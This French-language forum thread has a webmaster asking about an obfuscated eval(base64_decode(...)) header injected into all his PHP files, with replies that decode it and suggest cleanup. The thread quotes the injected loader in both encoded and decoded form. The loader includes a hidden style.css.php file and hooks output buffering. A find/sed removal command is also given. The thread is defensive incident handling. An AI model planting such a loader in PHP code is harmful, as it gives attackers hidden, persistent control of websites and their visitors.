Discussion :

[kilian]

Bonjour,

Je viens de m'apercevoir que chacun de mes fichiers php ont comme en-tete la chose suivante

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<?php /**/eval(b a s  e64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzUvZDI1MjY3NjAwMC9odGRvY3MvYXhlc3Mvc3RhdC9saWJzL2FydGljaG93L3BocDQvaW5jL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

le "b a s e " est normalement sans espace ( j'en ai mis au cas où )

Est ce qu'une personne sait d'où ceci peut venir, sachant que cela ne vient pas de moi ? Ce que c'est ? Est ce que j'ai une faille dans mon site ?
Je vous remercie d'avance pour votre aide
Cordialement

[puyopuyo]

effectivement cela ne sent pas bon. surtout qu'une fois décodé ca te donne bien du code php. Aprés il faut se demandé qui aimerait caché du code ? et qui aime nommé ces fonctions avec des nom du genre dgobh.

Si j'etais toi je me renseignerais rapidement mais je pense qu'il faudrait peut-être penser a retirer cette ligne.

[kilian]

J'ai deja retiré ces lignes... enfin oui et non, car, tous les fichiers du serveur sont impactés... Il y en a des centaines voir milliers....

Je viens d'envoyer un e-mail à mon hébergeur pour savoir s'il avait des logs sur cela...

De plus d'après ce que je lis dans ton post, tu as pu décoder le code ?
Est ce que tu peux me copier le code ici ?

J'aimerais savoir ce qu'il fait ce code...
BFFFF C'est la merde....

J'ai pu voir que peut être ca vient d'une de mes fonctions
move_upload_file
Alors que normalement je fais attention à l'extension...
mais d'après ce que j'ai pu voir sur le web. il y en a qui envoi par exemple :
script.php.jpg
Donc voila...

Si je déduis cela je devrais trouver quelque part sur le serveur un fichier de ce type, à moins qu'il l'ait effacé à la fin...

Merci pour vos aides précieuses...
A+

[puyopuyo]

la fonction base64decode sert a décodé.
si tu remplaces le eval par un echo ca n'executera plus le code php mais ca te l'affichera a sur la page.

[kilian]

Ok merci j'ai décodé le script...

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{$GLOBALS['mfsn']='/kunden/homepages/5/d252676000/htdocs/axess
/stat/libs/artichow/php4/inc/style.css.php';if(file_exists($GLOBALS['mfsn']))
{include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh'))
{ob_start('dgobh');}}}

J'ai regardé le fichier
"axess/stat/libs/artichow/php4/inc/style.css.php"

Est il est rempli de code ASCII, j'ai essayé de décoder mais ce dernier est codé doublement voir plus encore...

Pour les stats de mon site j'utilise phpMyVisites qui se trouve donc dans le dossier /stat/...

Est ce que c'est celui ci qui à une faille ?
Si oui je vire directement tout le dossier...

Si je supprime le dossier. Est ce que le script virus qui se trouve en en tete de chaque pages sera encore "actif" ?

A plus

[puyopuyo]

c'est difficile de voir comme ca d'où vient la faille. il faut éplucher les logs afin de voir ce qui a été bizarre. tu devrais esayer de contacter les gens de phpmyvisites pour voir si ils savent quelque chose.

à premiere vu si tu retire le fichier style.css.php tu devrais etre tranquil. car il fait un include de se fichier et n'enregistre la fonction dgobh que dans le cas ou l'include à ete effectué.

ca devrait te soulager un moment. mais essais de creuser dans tes logs et/ou de te rapprocher de la communauté de phpmyvisites. car si tu ne corrige rien tu te retrouveras encore avec le même problème dans quelques temps.

[kilian]

Oui j'ai déjà renommé le fichier de chez phpmyvisites...
pour être plus ou moins tranquille....
Bffff
J'ai essayé de me connecter sur leur forum mais pas accès enfin bon c'est la M....
Je te remercie en tout cas de ton aide.
Je vais voir ce que je peux faire...

[s.n.a.f.u]

Tu peux virer toutes ces entêtes pernicieuses à l'aide d'une commande bash du style

Code bash :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name '*.php' -exec sed -i 's#<?php.*\?eval(base64_decode([^)]*));\s*?>#<?php //replaced ?>#g' {} \;

ATTENTION : faire un backup et tester sans l'option -i !!!!!

[kilian]

Ok je te remercie pour ta commande, elle pourra m'être bien utile.
A bientot